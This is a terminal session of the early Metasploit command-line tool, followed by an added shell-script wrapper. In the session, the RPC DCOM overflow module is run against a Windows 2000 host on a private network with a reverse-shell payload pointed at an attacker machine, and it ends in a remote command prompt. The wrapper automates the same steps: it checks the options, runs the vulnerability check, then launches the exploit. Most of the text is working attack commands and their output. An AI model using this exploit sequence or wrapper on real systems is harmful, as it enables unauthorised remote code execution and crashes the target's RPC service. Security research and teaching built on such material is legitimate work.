hdm@ice metasploit $ ls exp/*.exp
exp/apache_chunked_win2k.exp  exp/iis_nsiislog_win2k.exp  exp/iis_webdav_win2k_sp3.exp  exp/samba_trans2open.exp
exp/apache_chunked_winnt.exp  exp/iis_printer_win2k.exp   exp/rpc_dcom_overflow.exp     exp/warftpd_165_win2k.exp

hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp
Usage: ./metasploit [var=val] [MODE]

Modes:
  (S)UMMARY   Show various information about the module
  (O)PTIONS   Show the available options for this module
  (P)AYLOADS  Show available payloads for this module
  (C)HECK     Determine if the target is vulnerable
  (E)XPLOIT   Attempt to exploit the target

hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp S
==================
= Information

Name:    RPC DCOM Remote Overflow
Version: 1.0
Author:  H D Moore
URL:     http://www.metasploit.com/

This exploits the overflow found by LSD in the DCOM service available over RPC. This module has been tested against all English versions of Windows 2000 and Windows XP. The target must have DCOM enabled and TCP port 135 open. This exploit will crash the RPC service on the remote system regardless of whether it is successful or not.

hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp P
==================
= Payloads

Win32 Bind Shell
Win32 Create User
Win32 Reverse Shell

hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' O
==================
= Module Options

LHOST [R] IP address to send the shell to.
RHOST [R] The target system's IP address.
OS [R] The operating system of the target (2K, XP)
LPORT [R] TCP port to send the shell to.
RPORT [E] The port that the RPC service is listening on (135).

hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' rhost=192.168.0.166 rport=135 lhost=192.168.0.247 lport=3567 OS=2K C
[*] Check: Vulnerable

hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' rhost=192.168.0.166 rport=135 lhost=192.168.0.247 lport=3567 OS=2K E
[*] Generating payload Win32 Reverse Shell (x86, win32, reverse)...
[*] Payload generation complete (668 bytes)
[*] Using return address 0x with scratch pad at 0x7ffde0cc
[*] Connection from 192.168.0.166:1085...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>exit
[*] Connection closed

hdm@ice metasploit $
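As an added example (not part of the original session and not Metasploit's own code): a POSIX sh pre-flight wrapper around the var=val command line shown above. It reads the [R] tags from the O(ptions) listing, refuses to run when a required option is missing, runs C(heck) first, and only invokes E(xploit) when the check printed "Check: Vulnerable", since the module summary warns that the exploit crashes the remote RPC service whether or not it succeeds. The function names (required_opts, missing_opts, check_says_vulnerable, run_module) are mine; the wrapper assumes ./metasploit and the module path exist as on the page and that the O and C output formats are exactly as shown, and it does not rely on the tool's exit status, which the page does not show.

```shell
#!/bin/sh
# Added example: pre-flight wrapper for the Metasploit 1.0 var=val CLI.
# Assumptions: ./metasploit and the module path exist as on the page;
# O and C output formats match the session above exactly.

# Names of the options tagged [R] (required) in an O(ptions) listing.
# $1 = text of the listing, as captured from: ./metasploit MODULE [var=val...] O
required_opts() {
    printf '%s\n' "$1" | awk '$2 == "[R]" { print $1 }'
}

# Print each required option not supplied on the var=val argument list.
# Option names are matched case-insensitively, since the page mixes
# rhost=... and OS=... on the same command line.
# $1 = O listing text; remaining args = var=val pairs
missing_opts() {
    listing=$1; shift
    for opt in $(required_opts "$listing"); do
        found=0
        for kv in "$@"; do
            name=$(printf '%s' "${kv%%=*}" | tr '[:lower:]' '[:upper:]')
            [ "$name" = "$opt" ] && found=1
        done
        [ "$found" -eq 1 ] || printf '%s\n' "$opt"
    done
}

# True when the C(heck) output contains the success line shown on the page.
# $1 = captured output of: ./metasploit MODULE var=val... C
check_says_vulnerable() {
    printf '%s\n' "$1" | grep -q '^\[\*\] Check: Vulnerable$'
}

# Usage: run_module ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' \
#            rhost=... rport=135 lhost=... lport=... OS=2K
# Argument order follows the page: module path, var=val pairs, then the mode.
run_module() {
    module=$1; shift
    listing=$(./metasploit "$module" "$@" O 2>&1)
    missing=$(missing_opts "$listing" "$@")
    if [ -n "$missing" ]; then
        printf 'missing required options: %s\n' \
            "$(printf '%s' "$missing" | tr '\n' ' ')" >&2
        return 2
    fi
    result=$(./metasploit "$module" "$@" C 2>&1)
    if check_says_vulnerable "$result"; then
        # Last chance to abort: per the module summary, E crashes the remote
        # RPC service whether or not the exploit succeeds.
        ./metasploit "$module" "$@" E
    else
        printf 'check did not report Vulnerable; not running E\n' >&2
        return 3
    fi
}

# With no arguments the file only defines the functions (so it can be sourced);
# with arguments it behaves like: run_module MODULE var=val...
case "${1:-}" in
    "") : ;;
    *)  run_module "$@" ;;
esac
```

The wrapper keys only on the printed text of the O and C modes because that is all the session shows; if a later version of the tool changes those strings, adjust the awk field test and the grep pattern rather than trusting exit codes.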